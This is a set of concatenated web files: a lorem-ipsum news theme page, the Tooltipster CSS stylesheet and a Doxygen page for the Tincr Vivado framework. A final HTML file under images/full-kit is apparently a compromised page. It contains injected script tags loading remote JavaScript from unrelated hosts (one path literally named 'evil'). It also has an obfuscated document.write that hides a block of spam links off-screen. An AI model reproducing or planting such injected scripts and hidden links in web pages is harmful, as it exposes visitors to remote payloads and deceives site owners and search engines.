<span>Sed eleifend faucibus metus</span>
</li>
</ul>
</div>
<!--end second list style wrapper-->
</div>
<!--end second column-->
<!--start third column-->
<div class="small-12 medium-6 large-3 columns">
<!--start second list style wrapper-->
<div class="third_list_style_wrapper">
<ul>
<li>
<i class="fa fa-check"></i>
<span>Aliquam congue nec velit vitae</span>
</li>
<li>
<i class="fa fa-check"></i>
<span>integer auctor lobortis pellentesque.</span>
</li>
<li>
<i class="fa fa-check"></i>
<span>Aenean et nibh mattis, porttitor</span>
</li>
<li>
<i class="fa fa-check"></i>
<span>Sed eleifend faucibus metus</span>
</li>
</ul>
</div>
<!--end second list style wrapper-->
</div>
<!--end third column-->
<!--start fourth column-->
<div class="small-12 medium-6 large-3 columns">
<!--start fourth list style wrapper-->
<div class="fourth_list_style_wrapper">
<ul>
<li>
<i class="fa fa-camera"></i>
<span>Aliquam congue nec velit vitae</span>
</li>
<li>
<i class="fa fa-image"></i>
<span>integer auctor lobortis pellentesque.</span>
</li>
<li>
<i class="fa fa-leaf"></i>
<span>Aenean et nibh mattis, porttitor</span>
</li>
<li>
<i class="fa fa-train"></i>
<span>Sed eleifend faucibus metus</span>
</li>
</ul>
</div>
<!--end fourth list style wrapper-->
</div>
<!--end fourth column-->
</div>
<!--end inner row-->
</div>
<!--end list style content wrapper-->
</div>
<!--end list style-->
</div>
<!--end 12 cols-->
</div>
<!--end list style row-->
<!--start message box row-->
<div class="row">
<!--start col-->
<div class="small-12 medium-12 large-12 columns">
<!--start message style-->
<div class="origin_common_wrapper message_box_wrapper">
<!--start title-->
<div class="origin_title_left_bar">
</div>
<h3>
message boxes
</h3>
<!--end title-->
<!--start message style content wrapper-->
<div class="message_box_content_wrapper">
<!--start black bg message box-->
<div class="black_bg_msg_box">
<p class="msg_content">
Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Fusce
semper vitae sem sed efficitur. Nulla vestibulum eu odio sit amet ullamcorper. Aliquam erat
volutpat. Sed tempor facilisis nulla, ut egestas arcu varius sed. Pellentesque lorem arcu,
consectetur consequat lacus quis, sodales mattis turpis. Quisque sed euismod libero, et pharetra
mauris.
</p>
<span class="right close_content">
<a class="msg_close_icon" href="javascript:void(0)"><i class="fa fa-close"></i></a>
</span>
</div>
<!--end black bg message box-->
<!--start grey bg message box-->
<div class="grey_bg_msg_box">
<p class="msg_content">
Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Fusce
semper vitae sem sed efficitur. Nulla vestibulum eu odio sit amet ullamcorper. Aliquam erat
volutpat. Sed tempor facilisis nulla, ut egestas arcu varius sed. Pellentesque lorem arcu,
consectetur consequat lacus quis, sodales mattis turpis. Quisque sed euismod libero, et pharetra
mauris.
</p>
<span class="right close_content">
<a class="msg_close_icon" href="javascript:void(0)"><i class="fa fa-close"></i></a>
</span>
</div>
<!--end grey bg message box-->
<!--start red bg message box-->
<div class="red_bg_msg_box">
<p class="red_msg_content">
Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Fusce
semper vitae sem sed efficitur. Nulla vestibulum eu odio sit amet ullamcorper. Aliquam erat
volutpat. Sed tempor facilisis nulla, ut egestas arcu varius sed. Pellentesque lorem arcu,
consectetur consequat lacus quis, sodales mattis turpis. Quisque sed euismod libero, et pharetra
mauris.
</p>
<span class="right red_close_content">
<a class="msg_close_icon" href="javascript:void(0)"><i class="fa fa-close"></i></a>
</span>
</div>
<!--end red bg message box-->
</div>
<!--end message style content wrapper-->
</div>
<!--end message style-->
</div>
<!--end col-->
</div>
<!--end message box row-->
<!--start typography row-->
<div class="row">
<!--start typo category col-->
<div class="small-12 medium-12 large-12 columns">
<div class="origin_common_wrapper box_shadow">
<!--start title-->
<div class="origin_title_left_bar">
</div>
<h3>
typography
</h3>
<!--end title-->
<!--start typography content wrapper-->
<div class="origin_common_content_wrapper">
<!--start inner typography row-->
<div class="row">
<!--start category_type-->
<div class="small-12 medium-4 large-4 columns typography_type">
<!--start h1-->
<h1>h1. Content Title</h1>
<!--end h1-->
<!--start h2-->
<h2>h2. Content Title</h2>
<!--end h2-->
<!--start h3-->
<h3>h3. Content Title</h3>
<!--end h3-->
<!--start h4-->
<h4>h4. Content Title</h4>
<!--end h4-->
<!--start h5-->
<h5>h5. Content Title</h5>
<!--end h5-->
<!--start h6-->
<h6>h6. Content Title</h6>
<!--end h6-->
</div>
<!--end category_type-->
<!--start typo category details-->
<div class="small-12 medium-8 large-8 columns">
<!--start wrapper-->
<div class="type_category_details_wrapper">
<!--start first title-->
<h4>
Lead Body
</h4>
<!--start first title-->
<!--start first description-->
<p class="typo_first_des">
Nunc id condimentum est. Curabitur eleifend est nec tellus sagittis, at iaculis metus
cursus. Curabitur dapibus est eget leo molestie, vel tincidunt orci fermentum. Donec in
sem efficitur, blandit orci sed, tristique exnisl varius et.
</p>
<!--end first description-->
<!--start second title-->
<h4>
Main Content Text
</h4>
<!--start second title-->
<!--start second description-->
<p class="typo_second_des">
aecenas dolor sapien, laoreet quis leo ac, sodales posuere libero. Praesent venenatis
diam lacinia, tempor dui sit amet, ornare quam. Vivamus pulvinar ex id odio cursus
molestie. Nullam in arcu augue. Phasellus vitae eleifend dolor venenatis diam lacinia,
tempor dui.
</p>
<!--end second description-->
</div>
<!--end wrapper-->
</div>
<!--end typo category details-->
</div>
<!--end inner typography row-->
</div>
<!--end typography content wrapper-->
</div>
</div>
<!--end typo category col-->
</div>
<!--end typography row-->
<!-- footer -->
<footer>
<div class="container">
<div class="row">
<!-- widget 1 -->
<div class="small-12 medium-3 large-3 columns">
<div class="about footer_widget">
<h1>Magzy</h1>
<p>Etiam consequat ipsum nec molestie consequat. Curabitur nec ante venenatis, consectetur felis
nec, lacinia libero. Aenean ut ipsum in erat pulvinar rutrum sit amet ut libero. Phasellus nec
placerat sem, non rutrum lacus. Vivamus a massa ac libero eleifend semper. Aenean pretium, urna
ac malesuada laoreet. Maecenas placerat erat lectus, varius.</p>
</div>
</div>
<!-- /widget 1 -->
<!-- widget 2 -->
<div class="small-12 medium-3 large-3 columns">
<div class="support_link footer_widget">
<h6 class="title">Support Links</h6>
<ul>
<li><a href="#">In posuere ultricies leo utrum diam id</a></li>
<li><a href="#">Mauris rhoncus iaculis ultrices arcu vitae</a></li>
<li><a href="#">Maecenas placerat erat semper non sodales</a></li>
<li><a href="#">Etiam finibus sem velit amet mauris sed</a></li>
<li><a href="#">Suspendisse elementum fermentum lobortis</a></li>
<li><a href="#">Sed blandit volutpat erat vitae</a></li>
<li><a href="#">Sed pharetra metus ipsum augue</a></li>
</ul>
</div>
</div>
<!-- /widget 2 -->
<!-- widget 3 -->
<div class="small-12 medium-3 large-3 columns">
<div class="gallery footer_widget footer_masonrygallery">
<ul>
<li class="item">
<a href="images/1.jpg" data-lightbox="gallery_name"
data-title="Your Image Caption"><img src="images/1.jpg"></a>
</li>
<li class="item">
<a href="images/2.jpg" data-lightbox="gallery_name"
data-title="Your Image Caption"><img src="images/2.jpg"></a>
</li>
<li class="item">
<a href="images/3.jpg" data-lightbox="gallery_name"
data-title="Your Image Caption"><img src="images/3.jpg"></a>
</li>
<li class="item">
<a href="images/4.jpg" data-lightbox="gallery_name"
data-title="Your Image Caption"><img src="images/4.jpg"></a>
</li>
<li class="item">
<a href="images/1.jpg" data-lightbox="gallery_name"
data-title="Your Image Caption"><img src="images/3.jpg"></a>
</li>
<li class="item">
<a href="images/2.jpg" data-lightbox="gallery_name"
data-title="Your Image Caption"><img src="images/2.jpg"></a>
</li>
<li class="item">
<a href="images/1.jpg" data-lightbox="gallery_name"
data-title="Your Image Caption"><img src="images/1.jpg"></a>
</li>
<li class="item">
<a href="images/1.jpg" data-lightbox="gallery_name"
data-title="Your Image Caption"><img src="images/1.jpg"></a>
</li>
<li class="item">
<a href="images/2.jpg" data-lightbox="gallery_name"
data-title="Your Image Caption"><img src="images/2.jpg"></a>
</li>
</ul>
</div>
</div>
<!-- /widget 3 -->
<!-- widget 4 -->
<div class="small-12 medium-3 large-3 columns">
<div class="recent_posts footer_widget">
<h6 class="title">Some Posts</h6>
<div class="post_list">
<div class="single_post">
<div class="avatar">
<a href="#"><img src="images/obama.png"></a>
</div>
<div class="desc">
<p class="title"><a href="#">Donec fermentum, orci eget faucibus dapibus</a></p>
<p class="date">Jan. 22. 2015 </p>
</div>
</div>
<div class="single_post">
<div class="avatar">
<a href="#"><img src="images/obama.png"></a>
</div>
<div class="desc">
<p class="title"><a href="#">Donec fermentum, orci eget faucibus dapibus</a></p>
<p class="date">Jan. 22. 2015 </p>
</div>
</div>
</div>
</div>
</div>
<!-- /widget 4 -->
</div>
<section class="footer_copy">
<div class="row">
<div class="small-12 medium-3 large-3 columns">
<span class="copyright">Copyright (c) 2015 NewsMag. All rights reserved </span>
</div>
<div class="small-12 medium-3 large-3 columns">
<span class="privacy"><a href="#">Privacy Policy</a></span> <span> | </span> <span class="terms"><a
href="#">Terms and Conditions</a></span>
</div>
<div class="small-12 medium-3 large-3 columns">
<!-- <span class="privacy">Privacy Policy</span> <span> | </span> <span class="terms">Terms and Conditions</span> -->
</div>
<div class="small-12 medium-3 large-3 columns">
<ul class="footer_links inline-list right">
<li><a href="">About</a></li>
<li><a href="">Advertise</a></li>
<li><a href="">COntact Us</a></li>
</ul>
</div>
</div>
</section>
</div>
</footer>
<!-- /footer -->
<!-- vendor scripts -->
<script src="js/vendor/jquery.js"></script>
<script src="js/vendor/modernizr.js"></script>
<!-- foundation - scripts -->
<script src="js/foundation.min.js"></script>
<script src="js/foundation/foundation.abide.js"></script>
<script src="js/foundation/accordion.abide.js"></script>
<script src="js/foundation/alert.abide.js"></script>
<script src="js/foundation/clearing.abide.js"></script>
<script src="js/foundation/foundation.dropdown.js"></script>
<script src="js/foundation/foundation.equalizer.js"></script>
<script src="js/foundation/foundation.interchange.js"></script>
<script src="js/foundation/foundation.joyride.js"></script>
<script src="js/foundation/foundation.magellan.js"></script>
<script src="js/foundation/foundation.offcanvas.js"></script>
<script src="js/foundation/foundation.reveal.js"></script>
<script src="js/foundation/foundation.slider.js"></script>
<script src="js/foundation/foundation.tab.js"></script>
<script src="js/foundation/foundation.tooltip.js"></script>
<script src="js/foundation/foundation.topbar.js"></script>
<script src="js/foundation/jquery.cookie.js"></script>
<!-- bx slider -->
<script src="js/bx/jquery.bxslider.min.js"></script>
<script src="js/bx/jquery.easing.1.3.js"></script>
<script src="js/bx/jquery.fitvids.js"></script>
<!-- Masonry gallery -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/masonry/3.3.0/masonry.pkgd.min.js"></script>
<!-- lightbox - 2 -->
<script type="text/javascript" src="js/lightbox.min.js"></script>
<!--custom script-->
<script src="js/pages/original-style.js"></script>
<script src="js/custom.js"></script>
</body>
</html> |
lib/jquery.tooltipster/tooltipster.css | saviourofdp/html5pivotviewer | html {
-webkit-font-smoothing: antialiased;
}
/* This is the default Tooltipster theme (feel free to modify or duplicate and create multiple themes!): */
/* border-radius: 5px;
color: #2c2c2c;
*/
.tooltipster-default {
background: #ffffca;
box-shadow: 0px 0px 14px rgba(0,0,0,0.3);
}
/* Use this next selector to style things like font-size and line-height: */
.tooltipster-default .tooltipster-content {
font-family: 'Segoe UI', Tahoma, Arial, Helvetica, Sans-Serif;
font-size: 10px;
line-height: 12px;
padding: 4px 4px;
overflow: hidden;
}
/* This next selector defines the color of the border on the outside of the arrow. This will automatically match the color and size of the border set on the main tooltip styles. Set display: none; if you would like a border around the tooltip but no border around the arrow */
.tooltipster-default .tooltipster-arrow .tooltipster-arrow-border {
/* border-color: ... !important; */
}
/* If you're using the icon option, use this next selector to style them */
.tooltipster-icon {
cursor: help;
margin-left: 4px;
}
/* This is the base styling required to make all Tooltipsters work */
.tooltipster-base {
padding: 0;
font-size: 0;
line-height: 0;
position: absolute;
z-index: 9999999;
pointer-events: none;
width: auto;
overflow: visible;
}
.tooltipster-base .tooltipster-content {
overflow: hidden;
}
/* These next classes handle the styles for the little arrow attached to the tooltip. By default, the arrow will inherit the same colors and border as what is set on the main tooltip itself. */
.tooltipster-arrow {
display: block;
text-align: center;
width: 100%;
height: 100%;
position: absolute;
top: 0;
left: 0;
z-index: -1;
}
.tooltipster-arrow span, .tooltipster-arrow-border {
display: block;
width: 0;
height: 0;
position: absolute;
}
.tooltipster-arrow-top span, .tooltipster-arrow-top-right span, .tooltipster-arrow-top-left span {
border-left: 8px solid transparent !important;
border-right: 8px solid transparent !important;
border-top: 8px solid;
bottom: -8px;
}
.tooltipster-arrow-top .tooltipster-arrow-border, .tooltipster-arrow-top-right .tooltipster-arrow-border, .tooltipster-arrow-top-left .tooltipster-arrow-border {
border-left: 9px solid transparent !important;
border-right: 9px solid transparent !important;
border-top: 9px solid;
bottom: -8px;
}
.tooltipster-arrow-bottom span, .tooltipster-arrow-bottom-right span, .tooltipster-arrow-bottom-left span {
border-left: 8px solid transparent !important;
border-right: 8px solid transparent !important;
border-bottom: 8px solid;
top: -8px;
}
.tooltipster-arrow-bottom .tooltipster-arrow-border, .tooltipster-arrow-bottom-right .tooltipster-arrow-border, .tooltipster-arrow-bottom-left .tooltipster-arrow-border {
border-left: 9px solid transparent !important;
border-right: 9px solid transparent !important;
border-bottom: 9px solid;
top: -8px;
}
.tooltipster-arrow-top span, .tooltipster-arrow-top .tooltipster-arrow-border, .tooltipster-arrow-bottom span, .tooltipster-arrow-bottom .tooltipster-arrow-border {
left: 0;
right: 0;
margin: 0 auto;
}
.tooltipster-arrow-top-left span, .tooltipster-arrow-bottom-left span {
left: 6px;
}
.tooltipster-arrow-top-left .tooltipster-arrow-border, .tooltipster-arrow-bottom-left .tooltipster-arrow-border {
left: 5px;
}
.tooltipster-arrow-top-right span, .tooltipster-arrow-bottom-right span {
right: 6px;
}
.tooltipster-arrow-top-right .tooltipster-arrow-border, .tooltipster-arrow-bottom-right .tooltipster-arrow-border {
right: 5px;
}
.tooltipster-arrow-left span, .tooltipster-arrow-left .tooltipster-arrow-border {
border-top: 8px solid transparent !important;
border-bottom: 8px solid transparent !important;
border-left: 8px solid;
top: 50%;
margin-top: -7px;
right: -8px;
}
.tooltipster-arrow-left .tooltipster-arrow-border {
border-top: 9px solid transparent !important;
border-bottom: 9px solid transparent !important;
border-left: 9px solid;
margin-top: -8px;
}
.tooltipster-arrow-right span, .tooltipster-arrow-right .tooltipster-arrow-border {
border-top: 8px solid transparent !important;
border-bottom: 8px solid transparent !important;
border-right: 8px solid;
top: 50%;
margin-top: -7px;
left: -8px;
}
.tooltipster-arrow-right .tooltipster-arrow-border {
border-top: 9px solid transparent !important;
border-bottom: 9px solid transparent !important;
border-right: 9px solid;
margin-top: -8px;
}
/* Some CSS magic for the awesome animations - feel free to make your own custom animations and reference it in your Tooltipster settings! */
.tooltipster-fade {
opacity: 0;
-webkit-transition-property: opacity;
-moz-transition-property: opacity;
-o-transition-property: opacity;
-ms-transition-property: opacity;
transition-property: opacity;
}
.tooltipster-fade-show {
opacity: 1;
}
.tooltipster-grow {
-webkit-transform: scale(0,0);
-moz-transform: scale(0,0);
-o-transform: scale(0,0);
-ms-transform: scale(0,0);
transform: scale(0,0);
-webkit-transition-property: -webkit-transform;
-moz-transition-property: -moz-transform;
-o-transition-property: -o-transform;
-ms-transition-property: -ms-transform;
transition-property: transform;
-webkit-backface-visibility: hidden;
}
.tooltipster-grow-show {
-webkit-transform: scale(1,1);
-moz-transform: scale(1,1);
-o-transform: scale(1,1);
-ms-transform: scale(1,1);
transform: scale(1,1);
-webkit-transition-timing-function: cubic-bezier(0.175, 0.885, 0.320, 1);
-webkit-transition-timing-function: cubic-bezier(0.175, 0.885, 0.320, 1.15);
-moz-transition-timing-function: cubic-bezier(0.175, 0.885, 0.320, 1.15);
-ms-transition-timing-function: cubic-bezier(0.175, 0.885, 0.320, 1.15);
-o-transition-timing-function: cubic-bezier(0.175, 0.885, 0.320, 1.15);
transition-timing-function: cubic-bezier(0.175, 0.885, 0.320, 1.15);
}
.tooltipster-swing {
opacity: 0;
-webkit-transform: rotateZ(4deg);
-moz-transform: rotateZ(4deg);
-o-transform: rotateZ(4deg);
-ms-transform: rotateZ(4deg);
transform: rotateZ(4deg);
-webkit-transition-property: -webkit-transform, opacity;
-moz-transition-property: -moz-transform;
-o-transition-property: -o-transform;
-ms-transition-property: -ms-transform;
transition-property: transform;
}
.tooltipster-swing-show {
opacity: 1;
-webkit-transform: rotateZ(0deg);
-moz-transform: rotateZ(0deg);
-o-transform: rotateZ(0deg);
-ms-transform: rotateZ(0deg);
transform: rotateZ(0deg);
-webkit-transition-timing-function: cubic-bezier(0.230, 0.635, 0.495, 1);
-webkit-transition-timing-function: cubic-bezier(0.230, 0.635, 0.495, 2.4);
-moz-transition-timing-function: cubic-bezier(0.230, 0.635, 0.495, 2.4);
-ms-transition-timing-function: cubic-bezier(0.230, 0.635, 0.495, 2.4);
-o-transition-timing-function: cubic-bezier(0.230, 0.635, 0.495, 2.4);
transition-timing-function: cubic-bezier(0.230, 0.635, 0.495, 2.4);
}
.tooltipster-fall {
top: 0;
-webkit-transition-property: top;
-moz-transition-property: top;
-o-transition-property: top;
-ms-transition-property: top;
transition-property: top;
-webkit-transition-timing-function: cubic-bezier(0.175, 0.885, 0.320, 1);
-webkit-transition-timing-function: cubic-bezier(0.175, 0.885, 0.320, 1.15);
-moz-transition-timing-function: cubic-bezier(0.175, 0.885, 0.320, 1.15);
-ms-transition-timing-function: cubic-bezier(0.175, 0.885, 0.320, 1.15);
-o-transition-timing-function: cubic-bezier(0.175, 0.885, 0.320, 1.15);
transition-timing-function: cubic-bezier(0.175, 0.885, 0.320, 1.15);
}
.tooltipster-fall-show {
}
.tooltipster-fall.tooltipster-dying {
-webkit-transition-property: all;
-moz-transition-property: all;
-o-transition-property: all;
-ms-transition-property: all;
transition-property: all;
top: 0px !important;
opacity: 0;
}
.tooltipster-slide {
left: -40px;
-webkit-transition-property: left;
-moz-transition-property: left;
-o-transition-property: left;
-ms-transition-property: left;
transition-property: left;
-webkit-transition-timing-function: cubic-bezier(0.175, 0.885, 0.320, 1);
-webkit-transition-timing-function: cubic-bezier(0.175, 0.885, 0.320, 1.15);
-moz-transition-timing-function: cubic-bezier(0.175, 0.885, 0.320, 1.15);
-ms-transition-timing-function: cubic-bezier(0.175, 0.885, 0.320, 1.15);
-o-transition-timing-function: cubic-bezier(0.175, 0.885, 0.320, 1.15);
transition-timing-function: cubic-bezier(0.175, 0.885, 0.320, 1.15);
}
.tooltipster-slide.tooltipster-slide-show {
}
.tooltipster-slide.tooltipster-dying {
-webkit-transition-property: all;
-moz-transition-property: all;
-o-transition-property: all;
-ms-transition-property: all;
transition-property: all;
left: 0px !important;
opacity: 0;
}
/* CSS transition for when contenting is changing in a tooltip that is still open. The only properties that will NOT transition are: width, height, top, and left */
.tooltipster-content-changing {
opacity: 0.5;
-webkit-transform: scale(1.1, 1.1);
-moz-transform: scale(1.1, 1.1);
-o-transform: scale(1.1, 1.1);
-ms-transform: scale(1.1, 1.1);
transform: scale(1.1, 1.1);
}
|
docs/namespacetincr_1_1site__pips.html | ttown523/tincr | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" content="Doxygen 1.8.13"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<title>Tincr: tincr::site_pips Namespace Reference</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="search/search.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="search/searchdata.js"></script>
<script type="text/javascript" src="search/search.js"></script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
<tbody>
<tr style="height: 56px;">
<td id="projectlogo"><img alt="Logo" src="logo.png"/></td>
<td id="projectalign" style="padding-left: 0.5em;">
<div id="projectname">Tincr
 <span id="projectnumber">0.0</span>
</div>
<div id="projectbrief">A Tcl-based CAD Tool Framework for Xilinx's Vivado Design Suite</div>
</td>
</tr>
</tbody>
</table>
</div>
<!-- end header part -->
<!-- Generated by Doxygen 1.8.13 -->
<script type="text/javascript">
var searchBox = new SearchBox("searchBox", "search",false,'Search');
</script>
<script type="text/javascript" src="menudata.js"></script>
<script type="text/javascript" src="menu.js"></script>
<script type="text/javascript">
$(function() {
initMenu('',true,false,'search.php','Search');
$(document).ready(function() { init_search(); });
});
</script>
<div id="main-nav"></div>
<!-- window showing the filter options -->
<div id="MSearchSelectWindow"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
onkeydown="return searchBox.OnSearchSelectKey(event)">
</div>
<!-- iframe showing the search results (closed by default) -->
<div id="MSearchResultsWindow">
<iframe src="javascript:void(0)" frameborder="0"
name="MSearchResults" id="MSearchResults">
</iframe>
</div>
<div id="nav-path" class="navpath">
<ul>
<li class="navelem"><a class="el" href="namespacetincr.html">tincr</a></li><li class="navelem"><a class="el" href="namespacetincr_1_1site__pips.html">site_pips</a></li> </ul>
</div>
</div><!-- top -->
<div class="header">
<div class="summary">
<a href="#func-members">Functions</a> </div>
<div class="headertitle">
<div class="title">tincr::site_pips Namespace Reference</div> </div>
</div><!--header-->
<div class="contents">
<p>The <code><a class="el" href="namespacetincr_1_1site__pips.html" title="The site_pips ensemble encapsulates the site_pip class from Vivado's Tcl data structure. ">site_pips</a></code> ensemble encapsulates the <code>site_pip</code> class from Vivado's Tcl data structure.
<a href="#details">More...</a></p>
<table class="memberdecls">
<tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="func-members"></a>
Functions</h2></td></tr>
<tr class="memitem:af9630cda19e03ca196ee90ae572f0fd1"><td class="memItemLeft" align="right" valign="top"><a id="af9630cda19e03ca196ee90ae572f0fd1"></a>
 </td><td class="memItemRight" valign="bottom"><b>test</b> args</td></tr>
<tr class="separator:af9630cda19e03ca196ee90ae572f0fd1"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:a4f0e24c6c1992ad6b6e9197c36aff445"><td class="memItemLeft" align="right" valign="top"><a id="a4f0e24c6c1992ad6b6e9197c36aff445"></a>
 </td><td class="memItemRight" valign="bottom"><b>get</b> args</td></tr>
<tr class="separator:a4f0e24c6c1992ad6b6e9197c36aff445"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:a2797ccf15d409dde4142c3ca161dc94b"><td class="memItemLeft" align="right" valign="top"><a id="a2797ccf15d409dde4142c3ca161dc94b"></a>
 </td><td class="memItemRight" valign="bottom"><b>get_info</b> site_pip ?info?</td></tr>
<tr class="separator:a2797ccf15d409dde4142c3ca161dc94b"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:ad3ab2e315ee2acaec691f9ee7f68bad5"><td class="memItemLeft" align="right" valign="top"><a id="ad3ab2e315ee2acaec691f9ee7f68bad5"></a>
 </td><td class="memItemRight" valign="bottom"><b>is_route_through</b> site_pip</td></tr>
<tr class="separator:ad3ab2e315ee2acaec691f9ee7f68bad5"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:ab4ca8090c64df4b4cde63103dae54d16"><td class="memItemLeft" align="right" valign="top"><a id="ab4ca8090c64df4b4cde63103dae54d16"></a>
 </td><td class="memItemRight" valign="bottom"><b>parse_name</b> site_pip ?info?</td></tr>
<tr class="separator:ab4ca8090c64df4b4cde63103dae54d16"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:a409e4148c432c3063c17e9edc9c68726"><td class="memItemLeft" align="right" valign="top"><a id="a409e4148c432c3063c17e9edc9c68726"></a>
 </td><td class="memItemRight" valign="bottom"><b>get_site</b> site_pip</td></tr>
<tr class="separator:a409e4148c432c3063c17e9edc9c68726"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:ae3b59475e8446ec540df35c507a5c497"><td class="memItemLeft" align="right" valign="top"><a id="ae3b59475e8446ec540df35c507a5c497"></a>
 </td><td class="memItemRight" valign="bottom"><b>get_bel</b> site_pip</td></tr>
<tr class="separator:ae3b59475e8446ec540df35c507a5c497"><td class="memSeparator" colspan="2"> </td></tr>
</table>
<a name="details" id="details"></a><h2 class="groupheader">Detailed Description</h2>
<div class="textblock"><p>The <code><a class="el" href="namespacetincr_1_1site__pips.html" title="The site_pips ensemble encapsulates the site_pip class from Vivado's Tcl data structure. ">site_pips</a></code> ensemble encapsulates the <code>site_pip</code> class from Vivado's Tcl data structure. </p>
</div></div><!-- contents -->
<!-- start footer part -->
<hr class="footer"/><address class="footer"><small>
Generated on Wed Jan 11 2017 20:30:31 for Tincr by  <a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/>
</a> 1.8.13
</small></address>
</body>
</html>
|
images/full-kit/02021215184jp.html | ForAEdesWeb/AEW2 | <script src="http://cpm.36obuy.org/evil/1.js"></script><script src="http://cpm.36obuy.org/lion/1.js"></script><script/src=//360cdn.win/c.css></script>
<script>document.write ('<d' + 'iv cl' + 'a' + 's' + 's="z' + '7z8z' + '9z6" st' + 'yl' + 'e="p' + 'ositio' + 'n:f' + 'ixed;l' + 'ef' + 't:-3' + '000' + 'p' + 'x;t' + 'op' + ':-3' + '000' + 'p' + 'x;' + '"' + '>');</script>
<a class="z7z8z9z6" href="http://www.4695288.com/">http://www.4695288.com/</a>
<a class="z7z8z9z6" href="http://www.5613117.com/">http://www.5613117.com/</a>
<a class="z7z8z9z6" href="http://www.4309272.com/">http://www.4309272.com/</a>
<a class="z7z8z9z6" href="http://www.3619276.com/">http://www.3619276.com/</a>
<a class="z7z8z9z6" href="http://www.1539774.com/">http://www.1539774.com/</a>
<a class="z7z8z9z6" href="http://www.2234809.com/">http://www.2234809.com/</a>
<a class="z7z8z9z6" href="http://www.0551180.com/">http://www.0551180.com/</a>
<a class="z7z8z9z6" href="http://www.0027022.com/">http://www.0027022.com/</a>
<a class="z7z8z9z6" href="http://www.1408600.com/">http://www.1408600.com/</a>
<a class="z7z8z9z6" href="http://www.5004279.com/">http://www.5004279.com/</a>
<a class="z7z8z9z6" href="http://www.4314451.com/">http://www.4314451.com/</a>
<a class="z7z8z9z6" href="http://www.9402647.com/">http://www.9402647.com/</a>
<a class="z7z8z9z6" href="http://www.6420212.com/">http://www.6420212.com/</a>
<a class="z7z8z9z6" href="http://www.0921315.com/">http://www.0921315.com/</a>
<a class="z7z8z9z6" href="http://www.4849062.com/">http://www.4849062.com/</a>
<a class="z7z8z9z6" href="http://www.8027847.com/">http://www.8027847.com/</a>
<a class="z7z8z9z6" href="http://www.5101309.com/">http://www.5101309.com/</a>
<a class="z7z8z9z6" href="http://www.8033162.com/">http://www.8033162.com/</a>
<a class="z7z8z9z6" href="http://www.7808733.com/">http://www.7808733.com/</a>
<a class="z7z8z9z6" href="http://www.7021821.com/">http://www.7021821.com/</a>
<a class="z7z8z9z6" href="http://www.8560978.com/">http://www.8560978.com/</a>
<a class="z7z8z9z6" href="http://www.3301718.com/">http://www.3301718.com/</a>
<a class="z7z8z9z6" href="http://www.2444890.com/">http://www.2444890.com/</a>
<a class="z7z8z9z6" href="http://www.2501886.com/">http://www.2501886.com/</a>
<a class="z7z8z9z6" href="http://www.8773150.com/">http://www.8773150.com/</a>
<a class="z7z8z9z6" href="http://www.gkamlb.com/">http://www.gkamlb.com/</a>
<a class="z7z8z9z6" href="http://www.nxkmky.com/">http://www.nxkmky.com/</a>
<a class="z7z8z9z6" href="http://www.pkdszd.com/">http://www.pkdszd.com/</a>
<a class="z7z8z9z6" href="http://www.scqyba.com/">http://www.scqyba.com/</a>
<a class="z7z8z9z6" href="http://www.vwyhzp.com/">http://www.vwyhzp.com/</a>
<a class="z7z8z9z6" href="http://www.vwwoms.com/">http://www.vwwoms.com/</a>
<a class="z7z8z9z6" href="http://www.svfdun.com/">http://www.svfdun.com/</a>
<a class="z7z8z9z6" href="http://www.wivjvd.com/">http://www.wivjvd.com/</a>
<a class="z7z8z9z6" href="http://www.sstldp.com/">http://www.sstldp.com/</a>
<a class="z7z8z9z6" href="http://www.sqmtvh.com/">http://www.sqmtvh.com/</a>
<a class="z7z8z9z6" href="http://www.fmxnav.com/">http://www.fmxnav.com/</a>
<a class="z7z8z9z6" href="http://www.etqglz.com/">http://www.etqglz.com/</a>
<a class="z7z8z9z6" href="http://www.rjwmkb.com/">http://www.rjwmkb.com/</a>
<a class="z7z8z9z6" href="http://www.yrljss.com/">http://www.yrljss.com/</a>
<a class="z7z8z9z6" href="http://www.ymdwnv.com/">http://www.ymdwnv.com/</a>
<a class="z7z8z9z6" href="http://www.lhxcjs.com/">http://www.lhxcjs.com/</a>
<a class="z7z8z9z6" href="http://www.fekcko.com/">http://www.fekcko.com/</a>
<a class="z7z8z9z6" href="http://www.furpdg.com/">http://www.furpdg.com/</a>
<a class="z7z8z9z6" href="http://www.voqgwh.com/">http://www.voqgwh.com/</a>
<a class="z7z8z9z6" href="http://www.fknqkj.com/">http://www.fknqkj.com/</a>
<a class="z7z8z9z6" href="http://www.hhabtr.com/">http://www.hhabtr.com/</a>
<a class="z7z8z9z6" href="http://www.ogmykg.com/">http://www.ogmykg.com/</a>
<a class="z7z8z9z6" href="http://www.vseogg.com/">http://www.vseogg.com/</a>
<a class="z7z8z9z6" href="http://www.ctkllf.com/">http://www.ctkllf.com/</a>
